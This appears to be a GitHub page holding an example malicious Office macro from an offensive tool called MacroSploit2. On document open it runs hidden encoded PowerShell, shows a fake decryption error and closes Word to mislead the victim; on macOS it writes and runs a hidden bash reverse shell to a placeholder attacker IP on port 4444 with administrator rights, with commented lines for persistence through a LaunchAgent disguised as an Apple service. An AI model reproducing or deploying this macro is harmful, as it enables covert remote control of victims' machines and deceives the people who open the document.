MacroSploit2/Example_Macro at master · cr7pt0/MacroSploit2 · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
Sub Auto_Open()
Dim x
x = "powershell -nop -win hidden -noni -enc <Shellcode here>"
Shell ("POWERSHELL.EXE " & x)

Dim title As String
title = "Document error"
Dim msg As String
Dim intResponse As Integer
msg = "An error has occurd while decrypting the file. Word is unable to continue."
intResponse = MsgBox(msg, 16, title)
Application.Quit
End Sub
Sub AutoOpen()
        #If Win64 Then
        Auto_Open
        #Else
        #If Win32 Then
        Auto_Open
        #Else

        MacScript "do shell script ""mkdir -p $HOME/.hidden"""

        MacScript "do shell script ""cat <<EOF > $HOME/.hidden/connect.sh\n#!/bin/bash\nbash -i >& /dev/tcp/<Reverse Shell IP Here>/4444 0>&1\nwait"""

        'MacScript "do shell script ""cat <<EOF > $HOME/.hidden/persist.sh\n#!/bin/bash\nmkdir -p /Library/LaunchDaemons\ncp $HOME/Library/LaunchAgents/com.apple.video2.plist /Library/LaunchDaemons/com.apple.video2.plist\nlaunchctl load /Library/LaunchDaemons/com.apple.video2.plist"""

        'MacScript "do shell script ""chmod +x $HOME/.hidden/connect.sh"""

        'MacScript "do shell script ""mkdir -p $HOME/Library/LaunchAgents"""

        'MacScript "do shell script ""cat <<EOF > $HOME/Library/LaunchAgents/com.apple.video2.plist\n<plist version=“1.0”>\n    <dict>\n    <key>Label</key>\n        <string>com.apple.video2</string>\n    <key>ProgramArguments</key>\n    <array>\n        <string>/bin/sh</string>\n        <string>$HOME/.hidden/connect.sh</string>\n    </array>\n    <key>RunAtLoad</key>\n        <true/>\n    <key>StartInterval</key>\n        <integer>120</integer>\n    <key>AbandonProcessGroup</key>\n        <true/>\n    </dict>\n</plist>"""

        'MacScript "do shell script ""launchctl load $HOME/Library/LaunchAgents/com.apple.video2.plist"""

        'MacScript "do shell script ""sh $HOME/.hidden/persist.sh"" with administrator privileges"

        MacScript "do shell script ""sh $HOME/.hidden/connect.sh"" with administrator privileges"

        #End If
        #End If
End Sub
Sub Workbook_Open()
        Auto_Open
End Sub